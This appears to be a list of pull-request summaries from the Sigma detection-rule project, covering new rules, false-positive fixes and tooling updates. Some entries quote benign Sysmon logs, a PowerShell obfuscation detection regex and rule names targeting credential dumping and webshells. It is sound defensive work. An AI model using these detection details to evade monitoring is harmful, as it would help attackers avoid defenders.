Added additional test for record type of ADD_USER which should be generated whether you have created auditd rule or not.
=> Modifying Creation Of An User Account

rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml
https://superuser.com/questions/1175267/what-is-this-rundll32-instance-running
=> Remove Windows 10 user experience false positive

tests/test_rules.py
eg #3724
I don't change the sigmac code to avoid break and many hours of works
check if selection name start with :
- or
- and
- not
=> Issue 3724 v2

rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml, rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml, rules/windows/process_creation/proc_creation_win_frombase64string_archive.yml, rules/windows/process_creation/proc_creation_win_x509enrollment.yml
done
- 42 | None | FromBase64String / Compression / X509Enrollment
- 43 | None | FromBase64String + Compression
=> Some rules for  Issue 575

rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml, rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml, rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml
This PR Replaces PR https://github.com/SigmaHQ/sigma/pull/2187
=> feat: new aadinternals related rules

.github/workflows/known-FPs.csv, rules/windows/builtin/security/win_security_service_install_remote_access_software.yml, rules/windows/builtin/system/win_system_service_install_remote_access_software.yml, rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml
This PR Replaces PR https://github.com/SigmaHQ/sigma/pull/2841
=> feat: new rules related to rat software based on #2841

tools/config/hawk.yml, tools/sigma/backends/hawk.py
=> Hawk backend update

rules/linux/process_creation/proc_creation_lnx_groupdel.yml, rules/linux/process_creation/proc_creation_lnx_userdel.yml
Delete User or Group Using Userdel or Groupdel
=> Add rule delete group or user

rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml, rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml
eg #1009 
`|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)'` did not pass the test so comment it
=> PowerShell Token Obfuscation

.github/workflows/sigma-test.yml
Update to the latest:
- https://github.com/actions/setup-python/releases/tag/v4.4.0
- https://github.com/actions/checkout/releases/tag/v3.2.0
=> Update Workflow action 

rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml, rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml
=> fix: Windows Defender detection

rules/linux/process_creation/proc_creation_lnx_base64_decode.yml, rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml, rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml, rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml, rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml, rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml, rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml, rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml, rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml, rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml, rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml
- New rules for CVE-2022-46169
- Multiple new rules related to Gtfobins
- Some fixes and updates to other rules
=> feat: updates and new rules

tests/test_rules.py
Adding this case as it was found in private testing.
=> feat: add `file_access` case in test

.github/workflows/sigma-test.yml, tests/logsource.json, tests/test_logsource.py, tests/test_rules.py
Add test for logsource and field name
=> Add Field name test

rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml, rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml
I've created a new linux detector looking for binaries executing out of a hidden folder or via a hidden binary itself.
=> Hidden Linux Binary Execution

rules-deprecated/other/generic_brute_force.yml, rules-deprecated/windows/file_event_win_hktl_createminidump.yml, rules-deprecated/windows/image_load_susp_winword_wmidll_load.yml, rules-deprecated/windows/posh_ps_access_to_chrome_login_data.yml, rules-deprecated/windows/powershell_suspicious_download.yml, rules-deprecated/windows/powershell_suspicious_invocation_generic.yml, rules-deprecated/windows/powershell_suspicious_invocation_specific.yml, rules-deprecated/windows/powershell_syncappvpublishingserver_exe.yml, rules-deprecated/windows/proc_access_win_in_memory_assembly_execution.yml, rules-deprecated/windows/proc_creation_win_lolbas_execution_of_wuauclt.yml, rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml, rules-deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml, rules-deprecated/windows/proc_creation_win_possible_applocker_bypass.yml, rules-deprecated/windows/proc_creation_win_powershell_bitsjob.yml, rules-deprecated/windows/proc_creation_win_susp_run_folder.yml, rules-deprecated/windows/process_creation_syncappvpublishingserver_exe.yml, rules-deprecated/windows/registry_event_asep_reg_keys_modification.yml, rules-deprecated/windows/registry_set_abusing_windows_telemetry_for_persistence.yml, rules-deprecated/windows/registry_set_silentprocessexit.yml, rules-deprecated/windows/sysmon_mimikatz_detection_lsass.yml, rules-deprecated/windows/sysmon_rclone_execution.yml, rules-deprecated/windows/win_lateral_movement_condrv.yml, rules-deprecated/windows/win_susp_esentutl_activity.yml, rules-deprecated/windows/win_susp_rclone_exec.yml, rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml
Update the modified with the date rule was deprecated.
Even if it is not a open discution for now , would like to keep track so we can add some day: 
"Deprecated rule are keep X days/years before removed them"
=> Update modified last change

rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml, rules/windows/builtin/dns_server_analytical/win_apt_gallium.yml, rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml, rules/windows/file/file_rename/file_rename_win_ransomware.yml, tests/logsource.json, tests/test_logsource.py, tests/test_rules.py
Add more test and find some mistake
`OriginalFilename` is the name of the process and `SourceFilename` the name of the file
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
EventID 257 is `Microsoft-Windows-DNSServer/Analytical`
EventID 150/770 is `DNS Server`
=> Field check

tests/logsource.json, tests/test_rules.py, tools/config/elk-windows.yml, tools/config/elk-winlogbeat-sp.yml, tools/config/elk-winlogbeat.yml, tools/config/fireeye-helix.yml, tools/config/logpoint-windows.yml, tools/config/logstash-windows.yml, tools/config/powershell.yml, tools/config/splunk-windows.yml, tools/config/sumologic.yml, tools/config/thor.yml, tools/config/winlogbeat-modules-enabled.yml, tools/config/winlogbeat-old.yml, tools/config/winlogbeat.yml
Resolves https://github.com/SigmaHQ/sigma-specification/issues/33
Note: I will add the first BitLocker rule after some more testing in a different PR
=> feat: add bitlocker channel

rules/windows/sysmon/sysmon_process_hollowing.yml
=> adding WMIADAP.exe to filters

rules/windows/process_creation/proc_creation_win_susp_cmd.yml
Example Manage Engine:
```
2023-01-03 21:46:15 REDACTED Sysmon: 1: Process Create | RuleName=technique_id=T1059,technique_name=Command-Line Interface | UtcTime=2023-01-03 21:46:15.066 | ProcessGuid={a79e0ea8-a227-63b4-8f60-020000000001} | ProcessId=4836 | Image=C:\Windows\System32\cmd.exe | FileVersion=10.0.17763.1697 (WinBuild.160101.0800) | Description=Windows Command Processor | Company=Microsoft Corporation | OriginalFileName=Cmd.Exe | OriginalCommandLine=C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat "pg_wal\000000010000008E000000EA" "000000010000008E000000EA")" | CommandLine=C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat pg_wal\000000010000008E000000EA 000000010000008E000000EA)" | CurrentDirectory=C:\ManageEngine\ADManager Plus\pgsql\data\ | …
```
=> fix: fp manageengine, landesk and varonis

rules/windows/process_creation/proc_creation_win_susp_cmd.yml
Example:
```
2023-01-04 12:03:30 REDACTED Sysmon: 1: Process Create | RuleName=technique_id=T1059,technique_name=Command-Line Interface | UtcTime=2023-01-04 12:03:30.909 | ProcessGuid={8F2F84E4-6B12-63B5-6F7A-01000000D900} | ProcessId=7164 | Image=C:\Windows\System32\cmd.exe | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Windows Command Processor | Company=Microsoft Corporation | OriginalFileName=Cmd.Exe | OriginalCommandLine="cmd" /C ver | CommandLine=cmd /C ver | CurrentDirectory=C:\ProgramData\Tenable\Nessus Agent\nessus\mod\com.tenable.nessus_agent\data\ | User=NT AUTHORITY\SYSTEM | LogonGuid={8F2F84E4-38FE-639D-E703-000000000000} | LogonId=0x3e7 | TerminalSessionId=0 | IntegrityLevel=System | Hashes=SHA1=99AE9C73E9BEE6F9C76D6F4093A9882DF06832CF,MD5=F4F684066175B77E …
```
=> FP: tenable nessus client calls cmd during scanning.

rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
On Linux git has no .exe extension
=> fix Image field

rules/windows/process_creation/proc_creation_win_double_ext_parent.yml
From VT when looking for https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa IOC
=> Add proc_creation_win_double_ext_parent

rules/windows/process_access/proc_access_win_invoke_patchingapi.yml
eg: https://github.com/D1rkMtr/UnhookingPatch
```
Process accessed:
RuleName: -
UtcTime: 2023-01-07 09:27:53.806
SourceProcessGUID: {8b8a3bea-3b19-63b9-d702-00000000bd00}
SourceProcessId: 8380
SourceThreadId: 5696
SourceImage: C:\git\UnhookingPatch\UnhookingPatch\PatchingAPI\x64\Debug\PatchingAPI.exe
TargetProcessGUID: {8b8a3bea-3b19-63b9-d802-00000000bd00}
TargetProcessId: 6676
TargetImage: C:\Windows\SYSTEM32\calc.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9e9b4|C:\Windows\System32\KERNELBASE.dll+9053|C:\Windows\System32\KERNELBASE.dll+789e|C:\Windows\System32\KERNELBASE.dll+7446|C:\Windows\System32\KERNEL32.DLL+678ec|UNKNOWN(000001F92C7500E4)
SourceUser: SIMU\Administrateur
TargetUser: SIMU\Administrateur
```
=> Add proc_access_win_invoke_patchingapi

rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml
Filter landscape-sysinfo tool calling who
=> filter some legitimate activity

rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml, tests/logsource.json, tools/config/elk-windows.yml, tools/config/elk-winlogbeat-sp.yml, tools/config/elk-winlogbeat.yml, tools/config/fireeye-helix.yml, tools/config/generic/windows-services.yml, tools/config/hawk.yml, tools/config/logpoint-windows.yml, tools/config/logstash-windows.yml, tools/config/powershell.yml, tools/config/splunk-windows.yml, tools/config/thor.yml, tools/config/winlogbeat-modules-enabled.yml, tools/config/winlogbeat-old.yml, tools/config/winlogbeat.yml, tools/config/zircolite.yml
Start to dig Microsoft-Windows-LSA/Operational
Do not use the rule if everybody get admin right 😄
=> Microsoft-Windows-LSA

rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml
According to Microsoft documentation, the parameter is -Filepath not -File-path. See: https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps
=> Correcting filepath parameter

.github/workflows/known-FPs.csv, rules-deprecated/windows/proc_creation_win_renamed_powershell.yml, rules-deprecated/windows/proc_creation_win_renamed_psexec.yml, rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml, rules/category/antivirus/av_hacktool.yml, rules/category/antivirus/av_password_dumper.yml, rules/windows/builtin/security/win_security_user_driver_loaded.yml, rules/windows/builtin/system/win_system_eventlog_cleared.yml, rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml, rules/windows/file/file_event/file_event_win_susp_dropper.yml, rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml, rules/windows/process_access/proc_access_win_invoke_patchingapi.yml, rules/windows/process_creation/proc_creation_win_msdt.yml, rules/windows/process_creation/proc_creation_win_renamed_binary.yml, rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml, rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml, rules/windows/process_creation/proc_creation_win_susp_cipher.yml, rules/windows/process_creation/proc_creation_win_susp_cmd.yml, rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml, rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml, rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml, rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml, rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml, rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
- Fixed some FP found in testing
- Merged some overlapping rules related to renamed binaries
- Updated metadata and detection logic of some rules
=> feat: enhancements and fp fixes

tools/sigma/backends/mixins.py
Revert name of alert to UUID .
When title is updated , the alert name change too.
Can get 2 alerte name for the same alert
=> Revert name to uuid

.github/workflows/known-FPs.csv, rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml
View a fun way to rename a malware executable in any-run
=> Add registry_set_susp_pendingfilerenameoperations

LICENSE, README.md
linking to the new DRL license repo
=> docs: detection rule license info

rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml, rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml, rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml, rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml, rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml, rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml, rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml, rules/cloud/azure/azure_app_appid_uri_changes.yml, rules/cloud/azure/azure_app_credential_added.yml, rules/cloud/azure/azure_app_delegated_permissions_all_users.yml, rules/cloud/azure/azure_app_end_user_consent.yml, rules/cloud/azure/azure_app_end_user_consent_blocked.yml, rules/cloud/azure/azure_app_owner_added.yml, rules/cloud/azure/azure_app_permissions_msft.yml, rules/cloud/azure/azure_app_privileged_permissions.yml, rules/cloud/azure/azure_app_role_added.yml, rules/cloud/azure/azure_app_uri_modifications.yml, rules/cloud/azure/azure_group_user_addition_ca_modification.yml, rules/cloud/azure/azure_group_user_removal_ca_modification.yml, rules/cloud/azure/azure_pim_activation_approve_deny.yml, rules/cloud/azure/azure_pim_change_settings.yml, rules/cloud/azure/azure_priviledged_role_assignment_add.yml
Updating MITRE Tactics & Techniques to align with existing classifications
=> Updating MITRE Tactics & Techniques

rules/windows/image_load/image_load_side_load_antivirus.yml
Add some missing dll from hijacklibs
- https://hijacklibs.net/entries/3rd_party/avast/wsc.html
- https://hijacklibs.net/entries/3rd_party/trendmicro/tmdbglog.html
=> Add more dll from hijacklibs

rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml, rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml, rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml, rules/cloud/azure/azure_ad_user_added_to_admin_role.yml, rules/cloud/azure/azure_blocked_account_attempt.yml, rules/cloud/azure/azure_change_to_authentication_method.yml, rules/cloud/azure/azure_conditional_access_failure.yml, rules/cloud/azure/azure_guest_to_member.yml, rules/cloud/azure/azure_legacy_authentication_protocols.yml, rules/cloud/azure/azure_mfa_denies.yml, rules/cloud/azure/azure_mfa_interrupted.yml, rules/cloud/azure/azure_pim_alerts_disabled.yml, rules/cloud/azure/azure_tap_added.yml, rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml, rules/cloud/azure/azure_user_password_change.yml, rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml
Update tags for MITRE ATT&CK. My Sigma VS Code plug-in didn't like https://attack.mitre.org/techniques/T1556/006/ but it should exist.
=> Update tags for MITRE ATT&CK

rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml
Fixed link and removed "RunHTMLApplication" cause it can also use with "Ordinal number".
=> proc_creation_win_susp_rundll32_script_run.yml

rules/windows/process_creation/proc_creation_win_office_shell.yml
Add ONENOTE.EXE to the rule to detect the ongoing OneNote phishing attacks
e.g. 
https://app.any.run/tasks/1ffa650a-1719-4d03-898b-951e7b1b8103
=> refactor: add ONENOTE.EXE susp Office shell spawn

rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml, rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml, rules/windows/process_creation/proc_creation_win_apt_elise.yml, rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml, rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml, rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml, rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml, rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml, rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml, rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml, rules/windows/process_creation/proc_creation_win_apt_sofacy.yml, rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml, rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml, rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
No logic change, just selection names modified
=> Minor Changes

tools/sigma/parser/rule.py
- Add edge case handling when converting rules that use one of the new modifiers introduced in PySIGMA
- Resolves #4002
=> fix: add new edge case handling

rules/application/jvm/java_xxe_exploitation_attempt.yml, rules/windows/file/file_event/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml, rules/windows/process_creation/proc_creation_win_apt_cozy_bear_phishing_campaign_indicators.yml, rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml, rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml, rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml
Typo correction in multiple rules (Title, filename, contents)
=> Typo correction

rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml
=> FP fix + cti submodule update

.github/ISSUE_TEMPLATE/bug_report.md, .github/ISSUE_TEMPLATE/rule_proposal.md, .github/PULL_REQUEST_TEMPLATE.md, .github/workflows/sigma-test.yml
This PR updates some aspects of the GitHub sigma workflow and issue/pr templates
For the Workflow section the following changes were introduced
- Added dependencies between jobs for fast fail. It runs as follows
- `YAML Lint -> Logsource Check -> Rest of the tests`
- Updated different Github actions to their latest version
- Updated `sigma-cli` to the latest version
- Removed the `Remove deprecated rules` action as rules with the `deprecated` status now reside on another folder so the check is not necessary anymore.
For the template section the following changes were introduced
- New issue template for rule proposals. In case someone isn't familiar with the SIGMA syntax but still wants to contribute ideas.
- Add convention section to the PR template
N/A
N/A
=> feat: update workflow and templates

rules/windows/builtin/security/win_security_successful_external_remote_smb_login.yml
fix FP with empty user and IP address
```
AURORA: Warning
MODULE: Sigma
MESSAGE: Sigma match found
RULE_TITLE: External Remote SMB Logon from Public IP
RULE_AUTHOR: Micah Babinski, @micahbabinski
RULE_DESCRIPTION: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
RULE_FALSEPOSITIVES: Legitimate or intentional inbound connections from public IP addresses on the SMB port.
RULE_ID: 78d5cab4-557e-454f-9fb9-a222bd0d5edc
RULE_LEVEL: high
RULE_LINK: https://github.com/SigmaHQ/sigma/blob/0.22-2084-g5b3f97776/rules/windows/builtin/security/win_security_successful_external_remote_smb_login.yml
RULE_MODIFIED: 2023/02/01
RULE_PATH: public\windows\builtin\security\win_security_successful_external_remote_smb_login.yms
RULE_REFERENCES: …
```
=> fix: FP with empty user and IP address

rules/web/webserver_generic/web_cve_2023_23752_joomla_exploit_attempt.yml
This is a new PR for https://github.com/SigmaHQ/sigma/pull/4051 to detect possible exploitation of CVE-2023-23752 in Joomla.
This rule detects the potential exploitation attempt of CVE-2023-23752 (an Improper access check flaw) in web service endpoints in Joomla CMS platform.
N/A
N/A
=> Added rule (fixed) for CVE-2023-23752 in Joomla

rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml, rules/windows/process_creation/proc_creation_win_cscript_vbs.yml, rules/windows/process_creation/proc_creation_win_regsvr32_anomalies.yml, rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml
Most of the rules cover "cscript" and "wscript".
Find sone missing one.
None
None
None
None
=> Update cscript/wscript detection

rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml
Add  [MicrosoftRedirectionURL](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md#atomic-test-47---event-viewer-registry-modification---redirection-url)
```json
{
"Computer": "DESKTOP-D7DCT5J",
"Correlation_ActivityID": "{00000000-0000-0000-0000-000000000000}",
"Details": "file://C:\\windows\\system32\\notepad.exe",
"EventID": "13",
"EventType": "SetValue",
"Execution_ProcessID": "2876",
"Execution_ThreadID": "4268",
"Image": "C:\\WINDOWS\\system32\\reg.exe",
"Keywords": "0x8000000000000000",
"Level": "4",
"Match_Strings": "SetValue in EventType, \\MicrosoftRedirectionURL in TargetObject",
"Module": "Sigma",
"Opcode": "0",
"ProcessGuid": "{eddad34b-9c0b-6404-e301-000000000700}",
"ProcessId": "1916",
"Provider_Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", …
```
=> Add MicrosoftRedirectionURL

rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml, rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
Summary of the Pull Request
Update Techniques and Tactics
Detailed Description of the Pull Request / Additional comments
Update Techniques and Tactics
- registry_set_persistence_event_viewer_events_asp.yml
- registry_set_winlogon_allow_multiple_tssessions.yml
Example Log Event (In Case of FP Fixes)
NA
Relevant Issues (In Case of Issue Fixes)
NA
=> Update Techniques and Tactics

.github/PULL_REQUEST_TEMPLATE.md
This PR updates the PR Template file.
- Add a "Thank you" message
- Adds instruction to not delete contents of the template (as it was seen being done by many first contributors)
N/A
N/A
=> feat: update PULL_REQUEST_TEMPLATE.md

rules-unsupported/win_security_susp_failed_logons_single_process.yml, rules-unsupported/win_security_susp_failed_logons_single_source_kerberos.yml, rules-unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml, rules-unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml, rules-unsupported/win_security_susp_failed_logons_single_source_ntlm.yml, rules-unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml
This PR changes the status of rules using the old SIGMAC pipe notation (correlation) to unsupported
Continuation from #4076
N/A
N/A
=> chore: change state to `unsupported`

rules/windows/image_load/image_load_side_load_antivirus.yml, rules/windows/image_load/image_load_side_load_rcdll.yml, rules/windows/image_load/image_load_side_load_wazuh.yml
This PR adds new rules related to DLL sideloading based on https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
N/A
N/A
N/A
=> feat: new rules related to possible dll sideloading

rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml, rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml, rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml
Add a new rule related to CVE-2023-23397
N/A
https://twitter.com/aceresponder/status/1636116096506818562
N/A
=> feat: new rule related to `CVE-2023-23397`

rules/windows/file/file_event/file_event_win_powershell_drop_binary.yml
Detect when powershell write a binary or script file on disk
=> Potential Binary Or Script Dropper Via PowerShell.EXE

rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml, rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml, rules/windows/process_creation/proc_creation_win_regsvr32_image.yml, rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml, rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml, rules/windows/registry/registry_event/registry_event_qakbot_registry.yml
Contribute new Sigma Rules to cover specific techniques mentioned by ZScaler in their recent blog post OneNote: A Growing Threat for Malware Distribution
Contribute 4 new rules
1. Suspicious Decoding Gzip Archive: Detects attempts of decoding encoded Gzip archive via PowerShell. 
2. PowerShell Web Download DLL File: Detects suspicious ways to download dll using PowerShell
3. Suspicious Rundll32 Execution With Image Extension: Detects execution of RUNDLL32.exe with DLL masquerading as image files
4. Qakbot Registry Key Activity: Detects registry key used by IceID in distributing malicious OneNote campaign
-->
=> feat: new rules related to ZScaler blog - OneNote: A Growing Threat for Malware Distribution

rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml
updated the detection title because activity word was wrong
just change the word activity 
no false positives
NULL
=> fix: detection name word 'activity'

rules/web/proxy_generic/proxy_ua_malware.yml
This PR adds new UAs related to Malware 
=> feat : new malware UA

rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml, rules/windows/network_connection/net_connection_win_susp_rdp.yml, rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml, rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml
This PR fixes some FPs found during testing
N/A
N/A
N/A
=> fix: fp found in testing

README.md
This PR updates the Readme.md file to reference SEKOIA.IO as a product that uses Sigma language along with its new correlation extension.
A single line in the Readme.md is added.
More details on the product: https://www.sekoia.io/en/sekoia-io-xdr/
FYI, the following blog article highlights how SEKOIA.IO uses Sigma Correlation for its detection: https://blog.sekoia.io/improving-threat-detection-with-sigma-correlations/
=> Reference SEKOIA.IO as a user of Sigma and Sigma Correlation

rules/windows/builtin/security/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
Improvement of detection logic
+ additional fieldname AccessList
+detection values
`Accesses `field values may appear as code. The string value appears in EventViewer, but different SIEMs can store the original value as it is stored in xml (e.g. in Microsoft Sentinel this field is not extracted by default data connector and user should extract it during query time to be able to use it in detection). Also the field name in xml is `AccessList `but not Accesses.
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656
=> Improvement of detection logic

rules/windows/image_load/image_load_side_load_iviewers.yml
This PR adds new rule related to DLL sideloading based on https://www.secureworks.com/research/shadowpad-malware-analysis
=> feat: new rule related to possible iviewers.dll sideloading

rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml, rules/windows/file/file_event/file_event_win_creation_system_file.yml
Fix FP with too strict filter
The filter needs to be `contains` as the field contains some binary, non-printable characters
=> fix: FP found in testing, filter needs contains

rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml, rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml, rules/windows/process_creation/proc_creation_win_rundll32_executable_invalid_extension.yml, rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml
Fixes found in testing environment
asgard2-agent fix needs to be more generic, as it is triggered by arbitrary playbooks and the parent process is not always determined (`ParentImage: '-'`)
=> fix: FPs found in testing environment

rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
Fix the detection
When try [redcannary](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md#atomic-test-1---windows-disable-lsa-protection) get no match
I dig the [commit](https://github.com/SigmaHQ/sigma/commit/d8046b5989014579f40ffb80d2978c2936e5f71e) history  and find that 'selection_target' is for 452bce90-6fb0-43cc-97a5-affc283139b3
```json
{"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","Level":"4","Keywords":"0x8000000000000000","Channel":"Microsoft-Windows-Sysmon/Operational","Hostname":"DESKTOP-D7DCT5J.simu.local","TimeCreated":"2023-03-25T11:50:56.640Z","@timestamp":"2023-03-25T11:50:56.640Z","EventID":1,"Message":"Process Create:\r\nRuleName: technique_id=T1112,technique_name=Modify …
```
=> Fix detection rule 8c0eca51-0f88-4db2-9183-fdfb10c703f9

rules/web/proxy_generic/proxy_ua_malware.yml
This PR adds new UAs related to Malware
=> feat : new malware UAs

rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml, rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml
Fix some  FP on windows 10 22H2
Rule_Title	Suspicious Volume Shadow Copy VSS_PS.dll Load
Rule_Title	Suspicious Volume Shadow Copy Vsstrace.dll Load
Match_Strings	
Image	C:\Windows\
ImageLoaded	\vss_ps.dll
Image	C:\Windows\System32\SystemPropertiesAdvanced.exe
ImageLoaded	C:\Windows\System32\vss_ps.dll
CommandLine	"C:\Windows\system32\systempropertiesadvanced.exe"
Company	Microsoft Corporation
Computer	DESKTOP-5L4QT48
Correlation_ActivityID	{00000000-0000-0000-0000-000000000000}
DefaultBase	0x7FFA6D140000
Description	Microsoft® Volume Shadow Copy Service proxy/stub
EventID	5
Execution_ProcessID	10132
Execution_ThreadID	5368
FileAge	1207d03h22m07s
FileCreationDate	2019-12-07T10:08:39
FileVersion	10.0.19041.1 (WinBuild.160101.0800)
Hashes …
=> Fix FP rule on windows 10 22H2

rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml
Fix Fp with office in file_event_win_susp_lnk_double_extension
"EventID":11,
"SourceName":"Microsoft-Windows-Sysmon",
"Image":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE",
"TargetFilename":"C:\\Users\\redacted\\AppData\\Roaming\\Microsoft\\Excel\\redacted\\redacted.xlsx.lnk",
=> Fix FP 3215aa19-f060-4332-86d5-5602511f3ca8

rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_susp_children.yml
This PR adds a new rule for potential suspicious child processes of 3CXDesktopApp.
N/A
N/A
N/A
=> feat: new rule related to susp child process of 3CXDesktopApp

rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
Fix the filter_empty
With sigmac
```bash
An unsupported feature is required for this Sigma rule (..\rules\windows\registry\registry_set\registry_set_disable_winevt_logging.yml): List values must be strings or numbers
```
```bash
$ python sigmac -t splunk -c config/generic/sysmon.yml /d/rootme/sigma/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
